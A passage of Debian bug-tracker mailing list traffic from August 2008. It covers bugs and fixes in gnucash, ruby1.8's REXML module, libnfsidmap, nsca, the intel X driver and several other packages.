appreciate specific suggestions.

Kind regards

T.
-- 
Thomas Viehmann, http://thomas.viehmann.net/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496807: gnucash: silently removes main files while trying to save without lock

2008-08-27 Thread Bas Wijnen
Package: gnucash
Version: 2.2.6-1
Severity: grave
Justification: causes data loss

I was trying to use gnucash over sshfs, to allow several machines to
handle the same file.  It complained that it was unable to get a lock,
and so couldn't prevent simultaneous writes.  This was no problem,
because there isn't another person working on them.  For the rest,
everything seemed to work fine.

However, when trying to reopen the file, I found that it had not been
written, but instead it was deleted.  So not only did I lose the work of
the session, but it actually deleted my previous work as well.

I tried creating a new file, which also complains about the lock file,
but seems to work fine otherwise, but it also doesn't create the file.

This would have been a critical issue (causes serious data loss),
except that gnucash writes loads of log and backup files, so normally
most of the work will not actually be lost.

As a quick fix, it would be acceptable to turn the lock warning into an
error.

Thanks,
Bas Wijnen


signature.asc
Description: Digital signature


Bug#491270: bug has been pending for three weeks

2008-08-27 Thread Thomas Viehmann
Hi,

this (RC!) bug has been pending for three weeks now.
Unless there are objections, I should think that August is a good month
to have a fix uploaded and will see to that if noone else does.

Kind regards

T.
-- 
Thomas Viehmann, http://thomas.viehmann.net/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU

2008-08-27 Thread William Pitcock
Hi,

On Wed, 2008-08-27 at 17:40 +0200, Thomas Viehmann wrote:
 William Pitcock wrote:
  I am not upload enabled at the moment, please proceed with the NMU.
 
  You might take a look at some of the other patches and see if they are
  worthwhile to include in the NMU too.
 
 If you can whip up a short MU for sponsoring, we could also go with
 that. Otherwise, I'd probably focus on the most urgent stuff, so I would
 appreciate specific suggestions.

Alright, I'll publish 1.5.1-4 on mentors sometime before Friday.

William



signature.asc
Description: This is a digitally signed message part


Bug#496808: ruby1.8: DoS vulnerability in rexml parsing module

2008-08-27 Thread Frank Louwers
Package: ruby1.8
Version: 1.8.5-4etch2
Severity: grave
Tags: security
Justification: user security hole

The rexml lib is vulnerable to a DoS attack. 
Please see 
http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/.

I know there isn't an official patch yet (except the overloading of the REXML 
module via 
http://www.ruby-lang.org/security/20080823rexml/rexml-expansion-fix.rb but I 
expect that
to be out soon.

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-domu
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages ruby1.8 depends on:
ii  libc6  2.3.6.ds1-13etch7 GNU C Library: Shared libraries
ii  libruby1.8 1.8.5-4etch2  Libraries necessary to run Ruby 1.

ruby1.8 recommends no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496807: gnucash: silently removes main files while trying to save without lock

2008-08-27 Thread Micha Lenk
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

forwarded 496807 http://bugzilla.gnome.org/show_bug.cgi?id=549595
thanks

Hi Bas,

thank you for your feedback on Gnucash.
I have forwarded your report to the upstream bug tracker as
http://bugzilla.gnome.org/show_bug.cgi?id=549595

Regards
  Micha

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFItXzCWN0/4pnhQbQRAiKrAJ9UwCF+zvVF7T2e2WIVlKhG/n5BPACfTC74
GpT7oBeAcLVsN96/1ihqrD8=
=A28K
-END PGP SIGNATURE-



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#496807: gnucash: silently removes main files while trying to save without lock

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 forwarded 496807 http://bugzilla.gnome.org/show_bug.cgi?id=549595
Bug#496807: gnucash: silently removes main files while trying to save without 
lock
Noted your statement that Bug has been forwarded to 
http://bugzilla.gnome.org/show_bug.cgi?id=549595.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496808: ruby1.8: DoS vulnerability in rexml parsing module

2008-08-27 Thread Thijs Kinkhorst
On Wednesday 27 August 2008 17:56, Frank Louwers wrote:
 The rexml lib is vulnerable to a DoS attack.
 Please see
 http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/.


This is CVE-2008-3790. Please mention it in the package changelog on uploads.


Thijs


pgpish8KyIIkh.pgp
Description: PGP signature


Bug#493217: libnfsidmap-0.21 is available

2008-08-27 Thread Steve Dickson
Kevin Coffman wrote:
 --- libnfsidmap-0.21/libnfsidmap.c~ 2008-08-02 10:52:00.289845221 +1200
 +++ libnfsidmap-0.21/libnfsidmap.c  2008-08-02 10:47:50.647889312 +1200
 @@ -101,7 +101,7 @@
char plgname[128];
int ret = 0;

 -   snprintf(plgname, sizeof(plgname), %s%s.so, PLUGIN_PREFIX, method);
 +   snprintf(plgname, sizeof(plgname), %s%s.so.0, PLUGIN_PREFIX, 
 method);

dl = dlopen(plgname, RTLD_NOW | RTLD_LOCAL);
if (dl == NULL) {


 
 Getting back to this.  I'm curious if there is a specific reason why
 the *.so symlink was not there?  Adding the .0 shouldn't be
 necessary.  But there may be a reason for not including the .so
 symlink that I am not aware of.
The reason the version (or a version) number is need is because 
some distros  only installed the .so with the -devel package which
is not normally installed...  The question is how do we get the 
version to change automagically when the soname changes?

steved.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496810: initscript nsca fails when invocked with start and already running

2008-08-27 Thread Vincent Danjean
Package: nsca
Version: 2.6-3.2
Severity: serious

  Hi,

  you should add in README.Debian that dpkg-reconfigure nsca is needed to
install startup links (I discovered it by looking at
/var/lib/dpkg/info/nsca.postinst..., not something usual users want to do).
README.Debian currently says :
by default nsca works with an init script /etc/init.d/nsca
But it does not say that, by default, symlinks are not installed.
  [This would be wishlist bug]

  However, trying to enable nsca, I found a bug:
atsina:/etc/init.d# dpkg-reconfigure nsca
update-rc.d: warning: /etc/init.d/nsca missing LSB information
update-rc.d: see http://wiki.debian.org/LSBInitScripts
Starting Nagios Service Check Acceptor: /usr/sbin/nsca already running.
ERROR: could not start nsca.
invoke-rc.d: initscript nsca, action start failed.
atsina:/etc/init.d#
  Missing LSB headers are already reported.
  But nsca also fails to return a 0 code when already running:
atsina:/etc/init.d# /etc/init.d/nsca start ; echo $?
Starting Nagios Service Check Acceptor: /usr/sbin/nsca already running.
ERROR: could not start nsca.
1
atsina:/etc/init.d# 

  According to policy 9.3.2 (and recents discussions on debian-devel), starting
an already running service or stopping an already stopped service must not
return an error code.

  Best regards,
Vincent


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 
'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.27-rc3-amd64 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#451791: closed by Julien Cristau [EMAIL PROTECTED] (Bug#451791: fixed in xserver-xorg-video-intel 2:2.3.2-2+lenny3)

2008-08-27 Thread Mike Hommey
[ Brice Goglin ]
* Add 02_xaa_by_default_on_i965.diff to switch back to XAA on
  i965 by default to avoid many rendering problems, closes: #451791.

Interestingly, I've never been hit by these rendering problems with EXA,
but I don't exactly have a 965G, but a 965GM. But the switch back to XAA
seems to apply to any 965...

Mike



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#451791: closed by Julien Cristau [EMAIL PROTECTED] (Bug#451791: fixed in xserver-xorg-video-intel 2:2.3.2-2+lenny3)

2008-08-27 Thread Julien Cristau
On Wed, Aug 27, 2008 at 19:25:17 +0200, Mike Hommey wrote:

 [ Brice Goglin ]
 * Add 02_xaa_by_default_on_i965.diff to switch back to XAA on
   i965 by default to avoid many rendering problems, closes: #451791.
 
 Interestingly, I've never been hit by these rendering problems with EXA,
 but I don't exactly have a 965G, but a 965GM. But the switch back to XAA
 seems to apply to any 965...
 
The rendering problems with EXA were reported by people with pretty much
every 965 variant, and we have no known good version.  Upstream was
never able to reproduce, so at this point this (or forcing
ExaNoComposite by default) was the only option left.

Cheers,
Julien



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#481134: Please hint poppler-data for lenny inclusion

2008-08-27 Thread Luk Claes
Hideki Yamane wrote:
 On Sun, 24 Aug 2008 19:45:13 +0200
 Luk Claes [EMAIL PROTECTED] wrote:
 unblocked
 
  Great thanks Luk!
  But, verrry sooorry, I've updated this poppler-data package before
  read this mail... 
 
  changelog is below, 1 bug fix and trivial changes.
 
 poppler-data (0.2.0-2) unstable; urgency=low

   * debian/control
 - add DM-Upload-Allowed: yes, because I'm DM :)
 - fix poppler-data should suggest libpoppler3 (Closes: #496268)
 - change Priority: optional from extra, same as cmap-adobe-*
 - add some descriptions for cmap-adobe-* users
 
  so, please unblock this again, please...
  I am terribly sorry about the inconvenience.

unblocked

Cheers

Luk



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#496818: imagemagick 7:6.4.3.2.dfsg1-1(amd64/experimental): FTBFS: make[1]: *** No rule to make target `j'. Stop

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 forcemerge 496212 496818
Bug#496212: imagemagick_7:6.4.3.2.dfsg1-1(ia64/experimental): FTBFS: No rule to 
make target `j'.  Stop.
Bug#496818: imagemagick 7:6.4.3.2.dfsg1-1(amd64/experimental): FTBFS: make[1]: 
*** No rule to make target `j'.  Stop
Forcibly Merged 496212 496818.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



  1   2   >